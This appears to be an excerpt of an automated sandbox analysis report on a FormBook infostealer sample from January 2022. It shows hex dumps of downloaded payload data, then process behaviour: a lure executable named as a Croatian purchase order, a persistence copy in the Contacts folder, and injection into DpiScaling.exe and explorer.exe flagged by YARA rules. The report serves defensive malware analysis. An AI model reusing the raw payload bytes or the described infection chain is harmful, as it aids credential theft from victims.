c2 bf 25 90 0c 28 6b 68 07 00 e3 9f 48 07 f6 c8 a1 43 70 98 3b 22 6c dc 0e 78 fa d0 c5 17 56 27 15 5e c7
              Data Ascii: a$Elj3q([KL/_Mt(w3xU)Z]tS_7)7:gGs+H|27Zb|F=#2|hT-N/2RO[P>i"h5u~_B4Vn$l6 I#5t%(khHCp;"lxV'^
              2022-01-14 10:26:21 UTC1228INData Raw: a7 0d 57 e1 96 eb a2 81 51 d8 19 40 aa e0 2b 34 be 6f b2 80 d3 de 27 5f d4 54 4f e5 86 c4 45 f0 16 f1 a2 91 29 26 f5 75 98 dd b2 9d 31 04 04 1e cf c0 63 b6 b8 8b 7e 38 bb f6 e5 8a c6 41 78 1f 45 e7 82 e5 97 5f c2 70 0e e8 36 80 83 55 fb 67 be 6d ad 14 cb ca 5f e5 97 44 9d 1c f9 50 19 7a 02 0d 70 13 4d e2 29 36 ad 06 01 99 65 a2 b8 96 c0 70 0e d8 19 1f 54 47 e1 b4 9f 17 69 bc 7c 25 3a 86 ff 75 9f 2b 22 e0 34 ba 67 a5 21 58 58 69 a2 ab 16 f6 cd f1 8d 4d fb 4c 4f 97 5d d5 d0 58 75 9b 4a 7f 73 87 67 bf d0 51 ed 9d 37 00 06 2a 9a 93 5f ce 40 93 48 75 c5 9c a4 bf ed 95 66 27 51 f2 f4 e7 89 62 07 93 49 c8 4f e3 8c 9e 9a e2 38 8a fc c9 c6 66 16 ec 00 0b 5f e5 bc 08 17 75 98 d9 ad 15 49 fd 71 90 ca 44 9d 35 02 09 8d 49 fd 79 9a e2 03 ee 16 c7 d4 4f f4 f2 f3 6f bf
              Data Ascii: WQ@+4o'_TOE)&u1c~8AxE_p6Ugm_DPzpM)6epTGi|%:u+"4g!XXiMLO]XuJsgQ7*_@Huf'QbIO8f_uIqD5IyOo
              2022-01-14 10:26:21 UTC1244INData Raw: 7d fc 96 b4 f6 88 95 52 1c a5 55 a4 d3 be 0c 82 86 9c c1 93 4c 64 24 d3 c3 b9 81 05 f3 02 6c 57 a8 dc 4f 97 36 df d5 bf 8f 24 b7 7d fd 1b 23 35 5d b0 ed f4 8c 4e 14 94 af 6b a6 a4 b1 5e 38 e4 61 be 0c 82 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 94 ac e5 e3 de 51 9b 3f 73 c6 1e aa e0 39 12 ee 13 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b8 ff 1c a5 cb a8 df d5 bf 8f 25 3a e8 7b e8 69 d0 34 af 13 77 9b 11 0d 06 75 cb a9 5f ba 04 65 c7 a0 ca 21 3d 6f dd d1 b6 fb 11 0d 24 b7 7c 7a 76 79 54 22 b3 71 0d 04 70 60 3c ec 70 60 1c a6 d6 42 fa 85 6e 5b b1 75 34 db cd ae e9 ec 70 60 1c a6 d6 42 fa 82 57 a8 dc 4a c7 a0 ca 27 3e f1 ff 1c 86 90 a7 59 ad 74 f8 8d 20 ab d6 42 fa 91 29 42 f8 8d 00 68 4f 97 36 cc 6b d5 bf 8a 0e 87 13 12 8f 24 b5 78 51 9b 3e f1 fd 0a de 53 9f 4d
              Data Ascii: }RULd$lWO6$}#5]Nk^8a$}Q?s9<rdE~n[%:{i4wu_e!=o$|zvyT"qp`<p`Bn[u4p`BWJ'>Yt B)BhO6k$xQ>SM
              2022-01-14 10:26:21 UTC1260INData Raw: c7 a0 ca 27 3e f1 fd 18 9d 43 7c 7a 76 6d 46 19 20 51 64 ba fb ec 8d 30 d2 4c 10 87 13 12 8f 24 b7 7d fc 40 f5 06 75 eb f0 7b f8 59 f9 0f 08 79 f4 84 8c 9e c5 9c 15 16 98 b8 ff 1c a6 d7 78 71 e2 5c 33 30 1a 91 19 1c a6 de 53 9f 48 07 f7 0b 00 d4 3d 6f dd d1 b6 fb 13 a5 01 ea 6f dd d1 b6 fb 13 12 8f 93 2d 4b 8e a2 ce 30 d2 ac 7a 51 9b 43 5b ab 9d bc f7 f4 88 95 46 24 ad 98 47 7a 89 1b 23 40 ef 06 8a 66 b6 f7 0b 76 6d c7 a0 ca 27 3e f1 fd 18 e5 e3 de 53 9f 48 07 f7 79 6b f2 80 ff 3b 70 9f b7 82 78 7d fc e6 42 e0 a7 a6 28 3f 7f 01 9f 52 e2 a3 ae 16 94 af 1d 28 de 53 9f 48 07 f7 0b 00 1a a1 4c 10 8b 1b 23 35 30 4d b5 78 0d 23 2f af 94 50 e6 69 d0 41 62 be f3 fd e7 eb f0 0d 04 65 c7 a0 ca 27 3e f1 fd 75 eb f0 7b f8 8d 20 ae 8c 01 cd ae 95 15 0c 7d 03 11 f2 8c
              Data Ascii: '>C|zvmF Qd0L$}@u{Yyxq\30SH=oo-K0zQC[F$Gz#@fvm'>SHyk;px}B(?R(SHL#50Mx#/PiAbe'>u{ }
              2022-01-14 10:26:21 UTC1276INData Raw: dc 74 63 f9 07 f4 84 b8 f1 fd 18 85 0c 91 60 37 5a 24 8d 28 c3 97 02 61 be 0c 95 30 c1 da 41 43 77 d5 b7 7e 7f 04 7c 7a 76 7e 7e 66 0b 97 2e 8d 27 2c c8 32 c5 d5 a6 f0 70 5b ba 3e f9 0c 9b 00 69 fe 91 29 42 e9 ed f1 c6 15 2c c2 1e a2 cd af 6f d7 c4 1a ac f9 07 f4 84 a4 da 4a 0b 13 13 19 24 bc 32 dd da 42 f9 0e 83 02 6c 57 b1 57 a8 c9 a2 ce 30 c1 da 53 b8 ff 09 fd 18 9d 50 50 12 84 8c 91 2c c9 a5 46 4a 00 53 94 95 3a eb f0 6d dd d1 b6 f0 70 60 33 5a 2f 50 11 0e 8c a0 c1 98 b8 db cf b2 f2 97 26 bb 94 ae f8 85 0d 0f 1a a9 7b f9 1e ab 62 41 78 69 d2 20 91 3a a1 47 be 07 cd a6 d4 3d 5b b9 81 05 f8 a2 dd 98 b8 de 54 22 b3 67 cd bd c3 96 b5 7e 7f 01 f3 25 3a fd 1d 28 c0 02 25 31 5f ba 0b 04 70 60 2f 19 14 af 60 06 7d ff 1c b0 ee 77 ef f1 fe 91 17 11 06 75 cf b0
              Data Ascii: tc`7Z$(a0ACw~|zv~~f.',2p[>i)B,oJ$2BlWW0SPP,FJS:mp`3Z/P&{bAxi :G=[T"g~%:(%1_p`/`}wu
              2022-01-14 10:26:21 UTC1292INData Raw: 0a 6a 52 1d 0a 62 41 78 75 8d 18 9c c1 f0 15 63 a5 59 ad 67 c9 7b 64 44 fe 9a bd 8a 99 3a e8 70 60 3c ec 72 0d cc 0a 8e a2 ce 30 3a e9 b8 fb 13 66 20 d6 27 4a 6a 41 78 71 e6 03 e6 60 3c ec 72 17 18 cf b3 65 c7 a0 ca 27 57 60 1d c9 b7 7d c4 1b 71 e3 cf b2 f2 85 72 64 45 86 56 26 bc 08 79 9d 8b 3a 24 a7 59 ad 61 1b 23 35 5d b6 92 63 e2 e7 e8 69 d0 32 73 e6 65 c7 a0 a3 99 1b 89 18 9d 2b d6 40 ad 66 58 4a 9a bf de 52 0c 82 f4 86 c2 14 85 0e 87 16 d3 bb 86 96 cc 2b 47 85 0e ee bf ae 74 78 71 e2 5a 6b d5 bf 8f 24 de 9b 1e 2c c6 1e aa e6 21 31 54 22 b3 1d e0 79 81 0a 7e 47 84 de 52 0c 82 87 16 95 32 d6 44 9b 3f 73 e6 65 ae 21 10 e2 4c 10 8b 1d 6c 57 a8 dc 4f fe 52 3c b8 f0 7b f8 ac 36 df d5 be 68 6b d4 3d 03 8f 52 69 b5 0a 70 08 e8 6b d5 bf 8a 14 b0 ec 72 00 06
              Data Ascii: jRbAxucYg{dD:p`<r0:f 'JjAxq`<re'W`}qrdEV&y:$Ya#5]ci2se+@fXJR+GtxqZk$,!1T"y~GR2D?se!LlWOR<{6hk=Ripkr
              2022-01-14 10:26:21 UTC1308INData Raw: ba 04 70 60 3c d8 47 dd d0 15 16 ed f6 d9 c9 84 8c 9e ce 66 49 89 17 1a c8 eb e8 ca 0a 7e 7f 11 bb 86 90 af 01 cd ae e9 fc 05 f3 02 65 b0 ca 27 3e e1 b5 78 71 eb 73 c1 92 db cc 2b 47 87 73 e6 65 c7 a0 a3 99 22 3a e8 69 d9 9a 89 68 de c2 16 98 b8 f5 2d 61 be 0c 80 b3 5d b6 fb 03 ca 27 3e fb 33 72 64 45 8e 17 1a a1 4c 10 8b 1b 23 08 79 f4 84 8c f7 c3 8f 54 11 0d 04 48 06 2d 4a 2a c5 e9 ee 26 bd ab 62 41 73 b0 ed f4 84 8c f7 c3 80 58 07 f7 0b 10 8a 99 3a e1 b0 ca 27 3e fe 44 fe 9a b4 81 22 b3 74 67 76 6d d9 c1 10 ac e5 e3 d0 0a 7f c9 a4 d3 bb 87 e3 de 53 9f 48 6e 93 3a 28 c0 11 04 22 9b 3f 73 d4 3c b4 f7 2a c5 e9 ee 26 bd ab 62 41 73 b0 ed f4 84 8c f7 c3 8e b4 db cd ae e6 f2 80 83 03 84 ab 62 41 77 9b 3f 73 ef 8e 85 0e 87 1c f6 88 95 3b e9 cb a9 5e 35 ac e4
              Data Ascii: p`<GfI~e'>xqs+Gse":ih-a]'>3rdEL#yTH-J*&bAsX:'>D"tgvmSHn:("?s<*&bAsbAw?s;^5
              2022-01-14 10:26:21 UTC1324INData Raw: 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 44 fe 9a ff 18 9d 42 fe 9b 0f 08 4b 8b 1b 21 34 da 3a e9 8c 9c f1 fe a8 db cd aa e7 e6 65 c7 f0 7a 06 77 8f 27 0e 83 48 0f 09 fe 92 aa e0 58 2a c4 1a a1 1c a7 29 40 95 31 64 41 3a e0 58 2f 58 2b 47 85 6e 5a 1f 2e 8f 22 b3 77 e9 ed f4 84 ec 73 d6 40 b7 7b f8 8e a4 d2 49 88 f5 04 40 f6 ba 03 ee 73 e1 db fd 19 2d 4e 14 96 b1 71 e2 5c 53 9e f5 04 32 d0 34 d8 40 f4 f4 85 6e 59 9d 40 c7 a7 59 a9 59 ac e5 e3 de 52 1d 28 c0 10 8b 1b 23 34 db cd ec 76 6d d8 42 fb 23 34 89 12 8f 26 b9 80 83 0a 7e 7e 7f 01 8a 98 88 97 74 6e 5b b2 f4 85 0e
              Data Ascii: n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdE~n[p`<rdDBK!4:ezw'HX*)@1dA:X/X+GnZ."ws@{I@s-Nq\S24@nY@YYR(#4vmB#4&~~tn[
              2022-01-14 10:26:21 UTC1340INData Raw: 33 a6 29 90 11 e5 1c 59 50 e5 66 c4 ca ac 1a 5f 6f 51 73 e6 21 b8 7b 59 52 e2 56 ac 0d fb ec 8c 9e 40 7e 80 7d 2e 14 7c 85 f1 03 ee f2 0d d4 b6 04 8e 77 41 90 a6 93 a4 ef 58 d5 40 ff b0 05 0c 7d 02 68 cb 22 4c ee a5 ae 01 15 e9 12 8b 9e 48 d7 4f 68 b0 38 34 33 59 e9 65 ff bd 75 14 9e 0b e8 96 4b 70 68 cb 22 4c ee a4 ce d8 b9 7e 81 0d 81 88 45 0b ff e2 89 e5 0b 00 2c 40 b1 d1 49 76 20 42 12 8f 24 85 c6 76 92 54 c9 13 fa 58 19 1f 6d af ab d8 b9 7e 81 09 7e f2 7f ff dd d1 5e c7 5f 44 f2 05 7e af e0 a7 a7 8f 01 02 6c 13 9b 77 4e 14 94 af 94 2b 48 c7 24 48 f8 87 e4 89 e8 96 4b 82 02 e7 18 63 10 f1 15 e9 13 ed f8 08 f4 54 a9 a1 b2 24 f8 65 c7 e4 e8 21 90 48 ec 8d de 99 cd 47 46 fc 68 88 80 6b d5 fb 9a 09 5a 2f 11 63 e4 09 eb 79 90 ff 45 da 8a aa 94 fe 65 cf 39
              Data Ascii: 3)YPf_oQs!{YRV@~}.|wAX@}h"LHOh843YeuKph"L~E,@Iv B$vTXm~~^_D~lwN+H$HKcT$e!HGFhkZ/cyEe9
              2022-01-14 10:26:21 UTC1356INData Raw: 54 a9 a1 b3 97 16 70 a7 d2 ea e5 a7 25 3a 13 91 62 49 d6 c9 85 87 77 df 2a a1 4c 51 b4 a5 3d 3a 28 f3 fa 1a 5e c7 45 a6 3f 73 a2 46 73 47 85 0e 87 95 b6 f4 84 8c da c2 65 fa 12 73 a3 d8 be 59 24 e0 0e d4 c5 58 a9 b2 79 a1 4c 50 94 6c 0c dc b0 12 87 35 b5 be 87 14 ea b5 fc 69 2f 55 d9 20 68 c5 60 de d3 68 c5 63 3c a6 e2 b4 f3 7e bf 0a 7a 30 59 5d 3d b5 f3 fd e7 ef 9c 29 14 c7 60 b7 7d f4 46 5e dd 5a 74 36 80 40 7e 73 22 30 d2 39 66 49 8c 11 69 2f af 63 b0 05 fc e2 5c cc 56 a6 14 1f c7 4b 71 1d 22 0d ed 37 9e 3a f9 83 e2 5c 33 59 a9 e4 bd cf 3f 73 a7 77 8f 4c 00 e1 be 55 fd 42 3a db 32 29 49 9f a0 35 a2 b2 a5 bd 8a d8 43 bc a9 5f 08 79 b0 82 73 eb 7b f9 65 97 da 0f 84 87 eb b5 be f8 c8 aa 3c a9 d5 40 0a 0d 6d 31 88 c0 9c 3e 0e b4 a7 b1 7b 08 3c 2a 29 07 7e
              Data Ascii: Tp%:bIw*LQ=:(^E?sFsGesY$XyLPl5i/U h`hc<~z0Y]=)`}F^Zt6@~s"09fIi/c\VKq"7:\3Y?swLUB:2)I5C_ys{e<@m1>{<*)~
              2022-01-14 10:26:21 UTC1372INData Raw: a4 c7 c8 33 d0 50 40 ac bf 4f a4 2c 36 8e bf 67 20 fb 98 44 bb 0d 18 ce cf aa 6b 21 74 e3 3a bd 07 3c 67 cc 2b 46 03 86 b0 64 21 01 15 72 64 05 1c ab 0a 2b 87 20 51 64 a1 24 5f ea 8a dc c2 44 8a 99 c1 ee f7 f0 3e 79 f4 84 9e 73 0e 84 07 91 dd 84 01 fa 18 4f a4 d7 b0 2d ce cc 6e d0 ec f9 f3 57 21 62 a5 91 aa 0c 09 ae 79 37 3c 09 70 3b 34 2b ac 1a 5e 72 e9 05 30 2d b4 0c a9 b6 0b 45 0d 04 30 3c 7d 94 bf 06 11 54 7b a2 0e b4 f6 88 95 9a 55 62 ca d7 91 a4 d3 ff 94 8b 0e 78 81 40 78 8e 5d 4b 01 02 9c 84 01 39 ed d4 b4 92 9b c0 75 eb b0 03 64 2d 1e 6a 61 41 87 f7 e0 b0 bd 7a 33 d4 e5 68 bc 83 5c 60 cc ef 7a 9a 36 8a 5a 72 81 8e f9 51 70 8b e4 9e 8f d4 d4 fe 65 38 bc 3e 19 1f 2c c9 a7 e3 36 9a 30 d2 79 1a 8f 4c 00 e1 be 55 fd 42 3a db 3d 84 73 19 54 30 3b a9 a1
              Data Ascii: 3P@O,6g Dk!t:<g+Fd!rd+ Qd$_D>ysO-nW!by7<p;4+^r0-E0<}T{Ubx@x]K9ud-jaAz3h\`z6ZrQpe8>,60yLUB:=sT0;
              2022-01-14 10:26:21 UTC1388INData Raw: a9 55 5b 4e ea f2 05 35 a2 31 aa 78 f4 0d f8 c8 a8 d9 37 9e 3b fe 1f ea 91 d6 bc 98 3d e6 69 93 a6 8a 72 bc 83 f5 f9 f5 f1 15 16 d8 2a 45 21 30 60 c3 68 b0 45 0d 8f db 32 7b 99 d2 39 22 c2 79 55 5b 4e ea c6 8b 96 b7 17 4a f4 7b 06 c1 16 15 13 ed 0b fe 4a 8e 64 ba fb ed 38 61 37 99 7f 8a 92 54 dd 2f 98 3d a9 a1 b3 8a 5d 33 d0 c8 66 c2 1e 55 5b 4f 57 2d 8d df 2a 3b d6 c7 29 bd 75 15 a6 52 96 4b 71 29 d3 53 60 c3 69 60 a9 d3 44 01 14 38 61 35 a2 31 c7 62 a9 5e 38 e5 e6 dc b0 12 71 35 c8 ae 16 67 32 7a f3 8f 21 ce cf 4c a8 59 6b 2a 3a 16 2c 4c 99 36 9c 4a 0b 00 68 d7 40 fa 51 1e 55 5b 02 54 ca 77 0f 4c 9b 6f 22 4c ee a0 4f 1a a1 4c 11 08 11 0d 04 70 d6 c7 af 6b d5 af 6b 39 1b a2 31 ab d6 78 99 6a 5e 7b 73 b6 27 7b 75 f7 61 46 46 8a 81 46 88 6a ad c9 86 78 71
              Data Ascii: U[N51x7;=ir*E!0`hE2{9"yU[NJ{Jd8a7T/=]3fU[OW-*;)uRKq)S`i`D8a51b^8q5g2z!LYk*:,L6Jh@QU[TwLo"LOLpkk91xj^{s'{uaFFFjxq
              2022-01-14 10:26:21 UTC1392INData Raw: cf 36 20 51 61 3e 19 da c1 93 6d 79 44 47 53 14 86 e5 23 b1 8f db 37 f3 ea ab e9 ec 36 59 39 6b 5e ee fc 69 1f af b0 de bb 0d f6 03 ca 2b ce c0 d5 3c b9 d6 14 c7 a0 ae 8d 44 fe 9a bd 89 e8 96 4b 71 e2 5c 33 3c ec 72 64 44 01 15 e9 13 d1 eb 15 9d 18 c3 c8 d4 78 fb f8 66 b6 04 ea 1a 48 c4 e5 1c 07 b5 90 a6 d7 c4 1e 10 53 da c7 a0 8a 07 5d de 43 f5 62 18 c4 40 35 6e ac a0 42 05 0c 69 63 2b 80 08 97 63 48 61 52 50 92 cd fe 62 04 fb 97 43 bc 8d df 2a 11 f3 ea 6e 1f aa 78 d0 ec 27 b5 87 ec d4 42 12 49 02 7f 8a 51 10 74 97 92 81 ed f4 c0 97 ae 48 57 70 25 b7 57 dc 8f a1 b3 8b ce 18 75 eb b4 70 f4 25 e6 30 59 52 e2 fa 38 0c 44 75 f8 06 bd 01 15 e9 48 53 77 ef bd 0c 16 39 36 03 ab ef ad 1b 20 95 cd 51 3f 15 fe 5c b8 00 97 cc 9e 2d 8d ab b1 fb f9 7a 56 d9 ce 4c 90
              Data Ascii: 6 Qa>myDGS#76Y9k^i+<DKq\3<rdDxfHS]Cb@5nBic+cHaRPbC*nx'BIQtHWp%Wup%0YR8DuHSw96 Q?\-zVL
              2022-01-14 10:26:21 UTC1408INData Raw: ea f2 21 2c bd 75 eb b1 f0 e7 da c9 83 7e bf 0a 7e 7f 01 e6 dd 80 83 4a 86 53 9f 0c 04 1c 05 0c 7d 03 b3 9c 91 29 03 6e c7 01 15 e9 13 8a 71 e2 1d a8 40 56 d9 37 9e a7 b1 6f a9 9e 40 f5 06 75 e7 5f 7a fd db 96 ee 88 6a ad ea 86 c0 11 4c 90 3a 49 d9 ec 76 e6 6a b9 7e 80 62 4b 66 49 89 17 f8 35 51 ee 77 cb 95 b1 54 26 35 a2 31 ab db 25 f9 84 73 19 fe be e4 61 be 0c 60 84 86 e5 1c a6 96 34 47 b8 7c 44 8a 42 7f d9 43 83 f5 f9 fe 72 35 0e 47 0e 44 fe 9a bd 86 28 c0 51 16 5b ea 34 ff 18 16 bc 0c 0b ff e3 21 f5 ee 37 0b 53 47 0e d6 11 cd 25 3a ac 74 88 b0 12 4f 1c a6 93 bc ec 57 57 68 c5 9c 85 9f a0 ef 06 b5 f3 02 28 51 77 ca d8 86 1b 23 71 73 16 bd 75 2b cc 2b 03 7f f5 23 ca b7 be 0c c6 9e f5 a5 aa 1f 98 f7 e3 de 17 9f f0 d8 b9 7e 81 70 88 6a ad d4 e3 36 d0 df
              Data Ascii: !,u~~JS})nq@V7o@u_zjL:Ivj~bKfI5QwT&51%sa`4G|DBCr5GD(Q[4!7SG%:tOWWh(Qw#qsu++#~pj6
              2022-01-14 10:26:21 UTC1424INData Raw: f4 84 84 a8 a0 49 81 21 75 62 be f3 fc fe 72 a1 c7 7b cb 41 f3 f0 f0 8f e0 db 98 ef af 38 e4 21 bc cb f2 de 09 3d e4 9f 6b 56 fe 99 ca 24 bf cf 39 42 fe 11 f2 7f fc 68 a6 f3 06 fe be 10 02 74 1d 2a 6d da c1 4b 8d d0 37 1e 55 5b 4d b7 76 19 9f 48 07 f7 a2 cd 25 cc 18 45 0b 51 cd fd db 96 ea 34 18 16 46 00 97 c9 5b 81 ed d0 30 59 ad 67 cc 2d 4b ca a2 0e 82 40 ff 68 46 73 dd f5 02 e7 c3 93 a4 15 3d 67 be 87 1f c6 9d 93 a6 fe ee 76 6c a1 4c 10 8b 1e aa a4 56 e6 60 fb 19 6b 2a 3a 17 e4 a3 a6 c6 2d 83 81 c6 35 22 4c ef 05 10 0a a4 58 2a c5 9c c5 9c 85 8b db c8 e4 6b a1 cc 2b 47 87 ea ef 79 f4 84 8e 43 fd d2 b2 e0 d3 bf 65 44 2e 46 52 4b dd 12 71 c2 96 76 6e 53 16 18 9d 43 7e b6 7a bc 83 00 14 90 5c b0 2e 32 29 bd 40 1d 2c 09 78 61 37 63 09 78 7f 7d f0 81 86 50
              Data Ascii: I!ubr{A8!=kV$9Bht*mK7U[MvH%EQ4F[0Yg-K@hFs=gvlLV`k*:-5"LX*k+GyCeD.FRKqvnSC~z\.2)@,xa7cx}P


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:11:25:22
              Start date:14/01/2022
              Path:C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Nova narudzba u prilogu.exe"
              Imagebase:0x400000
              File size:738816 bytes
              MD5 hash:97D7BF836142B0EBB1EBFC1A4173DC9D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Borland Delphi
              Reputation:low

              General

              Start time:11:25:42
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\DpiScaling.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\DpiScaling.exe
              Imagebase:0xf20000
              File size:77312 bytes
              MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Start time:11:25:45
              Start date:14/01/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff6fee60000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              General

              Start time:11:25:56
              Start date:14/01/2022
              Path:C:\Users\user\Contacts\Ajshkennyc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Contacts\Ajshkennyc.exe"
              Imagebase:0x400000
              File size:738816 bytes
              MD5 hash:97D7BF836142B0EBB1EBFC1A4173DC9D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Borland Delphi
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 28%, Virustotal, Browse
              • Detection: 33%, ReversingLabs
              Reputation:low

              General

              Start time:11:26:04
              Start date:14/01/2022
              Path:C:\Users\user\Contacts\Ajshkennyc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Contacts\Ajshkennyc.exe"
              Imagebase:0x400000
              File size:738816 bytes
              MD5 hash:97D7BF836142B0EBB1EBFC1A4173DC9D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Borland Delphi
              Reputation:low

              General

              Start time:11:26:27
              Start date:14/01/2022
              Path:C:\Windows\SysWOW64\DpiScaling.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\System32\DpiScaling.exe
              Imagebase:0xf20000
              File size:77312 bytes
              MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
